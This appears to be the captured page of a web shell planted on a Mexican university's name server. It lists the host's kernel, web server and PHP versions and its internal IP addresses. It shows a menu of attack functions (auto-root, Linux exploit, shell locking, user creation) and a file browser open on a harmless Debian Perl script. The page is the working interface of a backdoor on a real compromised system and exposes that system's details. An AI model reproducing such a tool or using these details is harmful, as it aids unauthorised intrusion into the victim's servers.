Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
snap /
snap-store /
1113 /
usr /
sbin /
[ HOME SHELL ]
Name
Size
Permission
Action
aspell-autobuildhash
13.4
KB
-rwxr-xr-x
ispell-autobuildhash
15.56
KB
-rwxr-xr-x
remove-default-ispell
2.86
KB
-rwxr-xr-x
remove-default-wordlist
2.86
KB
-rwxr-xr-x
select-default-ispell
3.23
KB
-rwxr-xr-x
select-default-wordlist
3.21
KB
-rwxr-xr-x
update-default-aspell
1
KB
-rwxr-xr-x
update-default-ispell
9.68
KB
-rwxr-xr-x
update-default-wordlist
7.5
KB
-rwxr-xr-x
update-dictcommon-aspell
1
KB
-rwxr-xr-x
update-dictcommon-hunspell
782
B
-rwxr-xr-x
update-icon-caches
596
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : update-dictcommon-hunspell
#!/usr/bin/perl -w use strict; use Debian::DictionariesCommon q(:all); dico_checkroot (); my $cachedir = "/var/cache/dictionaries-common"; my $class = "hunspell"; my %locales = (); updatedb ($class); build_emacsen_support (); build_squirrelmail_support (); # __END__ =head1 NAME update-dictcommon-hunspell - rebuild hunspell database and emacsen stuff =head1 SYNOPSIS update-dictcommon-hunspell =head1 DESCRIPTION WARNING: Not to be used from the command line unless you know very well what you are doing. This script, when called from hunspell dict package postinst or postrm will rebuild hunspell database as well as squirrelmail and emacsen stuff. =head1 SEE ALSO The dictionaries-common policy =head1 AUTHORS Rafael Laboissiere, Agustin Martin =cut
Close